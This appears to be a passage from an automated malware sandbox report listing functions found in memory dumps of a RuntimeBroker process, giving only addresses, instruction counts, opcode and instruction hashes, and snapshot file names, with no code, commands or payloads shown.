                                                                                                                                      • Instruction ID: 5f1989294d6844fead8fed2b70e2abd8cd22824e52e0a56156780d942fb4a864
                                                                                                                                      • Opcode Fuzzy Hash: c070b63b5cb2226ea717d3732ecfdafd7f56bc673fa46b6a2e9b6d20a76d20d5
                                                                                                                                      • Instruction Fuzzy Hash: FC017835909B8D8FCF54DF2888515E93BF0FF68740F4102AAE848C7291D738E654CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EC2C9 Relevance: .0, Instructions: 44COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e5c6777cf4bcdc144aa7faec6377c24629119659138d1627dab774f6ee59a761
                                                                                                                                      • Instruction ID: 271234052c2abba66ada113bf7a7c866c602b13988c5a64ef219634b33ebff43
                                                                                                                                      • Opcode Fuzzy Hash: e5c6777cf4bcdc144aa7faec6377c24629119659138d1627dab774f6ee59a761
                                                                                                                                      • Instruction Fuzzy Hash: C501B57190E78D8FDB5AEF6488696A97FB0FF25300F0505FBE408C61A2DA389594CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EC25D Relevance: .0, Instructions: 43COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ec1c9c56d30ee910a4a4ab9313f61ed5dff370fc5fcf98f507446b73809f9ebf
                                                                                                                                      • Instruction ID: f512e845c68b1a2bd347dcf4d0082f3f711fb59e1a783f7d85f635d8609d519c
                                                                                                                                      • Opcode Fuzzy Hash: ec1c9c56d30ee910a4a4ab9313f61ed5dff370fc5fcf98f507446b73809f9ebf
                                                                                                                                      • Instruction Fuzzy Hash: D301DB71D0964E8FDB99EF6884596E97FE0FF28300F4405BAE41CC61A2DA389594CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EF2D3 Relevance: .0, Instructions: 43COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ac83007492531be94ad9ad0e8d0afe6e838fe19c70f6d1b81ad18ac01c84f4c9
                                                                                                                                      • Instruction ID: a5fe4f0de01a0f19c6b614b74d3c24317fa936602bfef222b22523c2ca695aec
                                                                                                                                      • Opcode Fuzzy Hash: ac83007492531be94ad9ad0e8d0afe6e838fe19c70f6d1b81ad18ac01c84f4c9
                                                                                                                                      • Instruction Fuzzy Hash: 7AF0443184E3C85FDB029B748C686E97FF0EF56304F0946E7E448C60A2D7285654C752
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8A0C50 Relevance: .0, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c01140afa675a7aecf77d463bf72560151984d6720fd124eda93a6a882ad48aa
                                                                                                                                      • Instruction ID: 82483159f866b498a58fbfc97fcc16d075e9d368b1aff1608bda5f554a7033f9
                                                                                                                                      • Opcode Fuzzy Hash: c01140afa675a7aecf77d463bf72560151984d6720fd124eda93a6a882ad48aa
                                                                                                                                      • Instruction Fuzzy Hash: 2901F571E0D28E8FE7129BA4C8242EE77B0EF46310F0545B3D415DB1E6CA3C2614C752
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EEC8D Relevance: .0, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 13fdf66806e2aca30d633fb26ee3ca7c67bbd33670cb3359c6b694155f292a4e
                                                                                                                                      • Instruction ID: 7d5e75dc282ac992b913d7f7dc0af5dc6b3cb28c7ea965f6a6d736b039cc892f
                                                                                                                                      • Opcode Fuzzy Hash: 13fdf66806e2aca30d633fb26ee3ca7c67bbd33670cb3359c6b694155f292a4e
                                                                                                                                      • Instruction Fuzzy Hash: 9301D47090978D8FDB99EF6484596A97FE0FF28301F4401BAE818C21A2DA389194CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EECF9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6100244ff34bd9968f688eb009e4fd36f6783f91acb6bde8e938306f53b27c11
                                                                                                                                      • Instruction ID: 261cd21533db37bcf29b162a0d415db648a3fabf6f8705c1c51a21ce71b8fae5
                                                                                                                                      • Opcode Fuzzy Hash: 6100244ff34bd9968f688eb009e4fd36f6783f91acb6bde8e938306f53b27c11
                                                                                                                                      • Instruction Fuzzy Hash: 16019270A0978D8FDB9AEF6888692997FE0FF29201F4905EAD408C61A2D6389544CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8E40C9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 59f23d8313342e0356638084cf8de2088ec58e7ee9c41e9d01506c3e6ef92c10
                                                                                                                                      • Instruction ID: 7d38db39606ff9c2ba1c8fd41b4e0b22d88c099641a4af803c7fb7e7039b86a7
                                                                                                                                      • Opcode Fuzzy Hash: 59f23d8313342e0356638084cf8de2088ec58e7ee9c41e9d01506c3e6ef92c10
                                                                                                                                      • Instruction Fuzzy Hash: 3F014F7090968D8FDB95EF28C895A993FF0FF19300F0501EAE85CC7262D634E954CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EC671 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bdbd796c5ffd0a1c1643f1611506ecf7a6cbb6537b3d7bc657f510d9ea34a0ec
                                                                                                                                      • Instruction ID: 9933f17ff36a7ebe1c3a913e0361ed7b2cb9711a90fb1477ff03f7f1d056f85a
                                                                                                                                      • Opcode Fuzzy Hash: bdbd796c5ffd0a1c1643f1611506ecf7a6cbb6537b3d7bc657f510d9ea34a0ec
                                                                                                                                      • Instruction Fuzzy Hash: BCF0F67191968D9FEB55EF6488256EA7BA0FF14200F0501F6E81CC31E2EB389654CB01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EED69 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a556e46e2c489da48c8f1bed480267b843b9c99cd0939fc660aadd29eec89c3
                                                                                                                                      • Instruction ID: 047df05e64f52154ce796180985f0266e8423707791e0d8df9e6220dd75dda83
                                                                                                                                      • Opcode Fuzzy Hash: 3a556e46e2c489da48c8f1bed480267b843b9c99cd0939fc660aadd29eec89c3
                                                                                                                                      • Instruction Fuzzy Hash: A4F0F971A0E7C94FD7AA5B244C711D53FA0FF16200F0A02FAE45CC65E3EA595544C302
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EFF4A Relevance: .0, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 574089a1109576d694961ad97df7a592ac92f1e3fe399fbc8a0a51a475ccc2fd
                                                                                                                                      • Instruction ID: 4c0063cce08d6dc6dfb52d4b190123def9cf37f67730b9ab62f1cc6a57f505a7
                                                                                                                                      • Opcode Fuzzy Hash: 574089a1109576d694961ad97df7a592ac92f1e3fe399fbc8a0a51a475ccc2fd
                                                                                                                                      • Instruction Fuzzy Hash: E8015E30A0850D8FEB28EB84C894BEDB7B1FF58314F644175D40AD7295DF38AA86CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D4741 Relevance: .0, Instructions: 37COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7742425173180be3432e522296d39068cfa1301f210615c85ea5b273e5ab3536
                                                                                                                                      • Instruction ID: d4860a5c1332a8e7d169f1ae0019919a524043be3ce56d655c1448c470c73519
                                                                                                                                      • Opcode Fuzzy Hash: 7742425173180be3432e522296d39068cfa1301f210615c85ea5b273e5ab3536
                                                                                                                                      • Instruction Fuzzy Hash: 7FF0907091868D8FDB55EF6488596ED7BF0FF58305F4145EBE818C22A2DB389294CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EB2A9 Relevance: .0, Instructions: 37COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8720770a20f06afcf7422632a1fa7429dd36aec68e033f6dca37e95790f3aaf6
                                                                                                                                      • Instruction ID: 93763f2ef8f1300a3f36c5ff891a4ecb7c3dfa5937d268ff7dd6c8fb61ada25a
                                                                                                                                      • Opcode Fuzzy Hash: 8720770a20f06afcf7422632a1fa7429dd36aec68e033f6dca37e95790f3aaf6
                                                                                                                                      • Instruction Fuzzy Hash: 35F0C27190E68E5FEB66BB6448AA2EC7FB0FF15300F0505F7E458C61E3D92855848702
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B62AD Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ab4fc9a15c6360b47525f2eec01a1adec84d28b71979eb451347305908dcf115
                                                                                                                                      • Instruction ID: aa82cb8fc0af2ffe5a09660fe77bb883253b1f6d6d131f7eabf4e27711dec42c
                                                                                                                                      • Opcode Fuzzy Hash: ab4fc9a15c6360b47525f2eec01a1adec84d28b71979eb451347305908dcf115
                                                                                                                                      • Instruction Fuzzy Hash: 72F06D7050D69E8FDB96DF28C895A993BA0FF69300F0501AAE41CC71A2D774E964CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EA840 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 638192129d616ddb20887450e69bb5c8cabaed3981613fd45f280481222b9fd5
                                                                                                                                      • Instruction ID: 41e5d0e54aef79e855619ed0866a065cf6d35ac7da63386f9b67ea93b60ef4c1
                                                                                                                                      • Opcode Fuzzy Hash: 638192129d616ddb20887450e69bb5c8cabaed3981613fd45f280481222b9fd5
                                                                                                                                      • Instruction Fuzzy Hash: 05F09C70A0464EDFEB98FF6884596ED77E0FF28301F5005B6E81CC25E5DA346190CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EC529 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f5aaa748452ce544eb9983ce7894f7228fc4596ea77cb8d500166bba24a707df
                                                                                                                                      • Instruction ID: e7ff612f9399f584160bd257f7e2a7d6188b9800171ce4561d529d8759dbb365
                                                                                                                                      • Opcode Fuzzy Hash: f5aaa748452ce544eb9983ce7894f7228fc4596ea77cb8d500166bba24a707df
                                                                                                                                      • Instruction Fuzzy Hash: C9F0F971D0E7C94FD76A9B644C751953FA0FF16200F0A05EBE45CC71E3D9189554C702
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D9C5E Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d64044e4247256aa88254984798ce27808b64db6c4c58dbde6956f1fe25ba91a
                                                                                                                                      • Instruction ID: 63d2c3bfdc5895a09e80a3118ce05f14bdc26e519f118f07e26d55a4ca15f37c
                                                                                                                                      • Opcode Fuzzy Hash: d64044e4247256aa88254984798ce27808b64db6c4c58dbde6956f1fe25ba91a
                                                                                                                                      • Instruction Fuzzy Hash: 98F08C3095978D8FDB559B6888682997FF0FF09204F4145EBD808C20A2D6385554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B6ACD Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 78da865863dae21392fd760bedfc3abca0d0e114c9e780ba4185e00a31b76042
                                                                                                                                      • Instruction ID: f72aaf9e2f62602434c2dced701ec55e42087262e32d9b9d74d9b4903932c677
                                                                                                                                      • Opcode Fuzzy Hash: 78da865863dae21392fd760bedfc3abca0d0e114c9e780ba4185e00a31b76042
                                                                                                                                      • Instruction Fuzzy Hash: 01F06D3050E68D8FCF95DF18C865A9A7FE0FF29300F0501A6E418C71A2D734E9A4CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D04F9 Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6da1aaff5a3521233c1da55b3f99d84c9f1e5f72eb3e468796937a3232d21a8d
                                                                                                                                      • Instruction ID: 5c157ca0f062d4346aab7c672ab6dec212b04276c9efe1b0b90dba3203a1e3f3
                                                                                                                                      • Opcode Fuzzy Hash: 6da1aaff5a3521233c1da55b3f99d84c9f1e5f72eb3e468796937a3232d21a8d
                                                                                                                                      • Instruction Fuzzy Hash: 1201DC7090C78D8FDB56DF2488A96A93FF0FF19300F0501EBE808C62A6C6389594CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B6155 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e8cba6e0fc9d7ccee71babd2e30db19e7885c863d85c8e5dc4d39facf96f2dc2
                                                                                                                                      • Instruction ID: fa72164a6c2e1ef40989d5bbcc9a536fd2124322673fa37469f5c8c03ad23b6e
                                                                                                                                      • Opcode Fuzzy Hash: e8cba6e0fc9d7ccee71babd2e30db19e7885c863d85c8e5dc4d39facf96f2dc2
                                                                                                                                      • Instruction Fuzzy Hash: 67F0E27092968D8FDB55EF68C8686EDBFF0FF09300F4100EAD808C21E2DA349694CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8E4586 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0dc8107b552cda5c3dcc80a9be5442465896a6e9cccedfa9405e2c5e2e375687
                                                                                                                                      • Instruction ID: 533c57f40dba9943b529815fff4ec9a5ac10613990b8857ec6c4230d5a01e8fe
                                                                                                                                      • Opcode Fuzzy Hash: 0dc8107b552cda5c3dcc80a9be5442465896a6e9cccedfa9405e2c5e2e375687
                                                                                                                                      • Instruction Fuzzy Hash: F701E430A05508CFEB68EF84C494FA8B7B1EB59315F0541A9C41EEB2A1CA75A981CF01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D9D59 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: dc553c4982b37dbefcacb435be9244f29b15f65d3d7abfac3b2a7b7051f0dc1d
                                                                                                                                      • Instruction ID: fa9c0ca11fd3c69632db86b892043f1e9ce05cd41ad14d00914ca5059b0610b1
                                                                                                                                      • Opcode Fuzzy Hash: dc553c4982b37dbefcacb435be9244f29b15f65d3d7abfac3b2a7b7051f0dc1d
                                                                                                                                      • Instruction Fuzzy Hash: FEF0543191978C9FDB52AF6488686E97FF0FF16200F4645E7E418C71E2DA349A54C711
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B6105 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fe492a27b052302c5c1c233a828bb925e71135d1840db9879794a17799370be1
                                                                                                                                      • Instruction ID: 7c6a42d322580d64523d1e1ce3a6927187500ee54a13f2448fc9a4a83ef1a435
                                                                                                                                      • Opcode Fuzzy Hash: fe492a27b052302c5c1c233a828bb925e71135d1840db9879794a17799370be1
                                                                                                                                      • Instruction Fuzzy Hash: F7F08C7194E28D9FDB51AB74886D69D7FB0FF18300F0505ABD448C61A2DA3496948B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B664D Relevance: .0, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4f76afec7725e0ea149d610055577a7b1475845e1d10cbfc99e297ddbeee302c
                                                                                                                                      • Instruction ID: e9ab528c1a01fc2b8d4eaac6dbeb28f422b6a2e2f4f597f3d2c583d54872680b
                                                                                                                                      • Opcode Fuzzy Hash: 4f76afec7725e0ea149d610055577a7b1475845e1d10cbfc99e297ddbeee302c
                                                                                                                                      • Instruction Fuzzy Hash: 56F02070E4D12A9ED714DFA4A8A24FDFB60DF4B300F20447AD81C921C7EA3822428A81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EF692 Relevance: .0, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7ad92a438369f5e5ade5d8fe39675ae3b31a69f7565652af0b63697886fe52ba
                                                                                                                                      • Instruction ID: 3652528618717b4f1b681947e9cbd063c954327a046800d168c1076454953c77
                                                                                                                                      • Opcode Fuzzy Hash: 7ad92a438369f5e5ade5d8fe39675ae3b31a69f7565652af0b63697886fe52ba
                                                                                                                                      • Instruction Fuzzy Hash: 98F0EC30E0550E8BEB28EF84C4647FC77B1AB5C319F154139C41AA62E0CA79A984CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EA1DD Relevance: .0, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
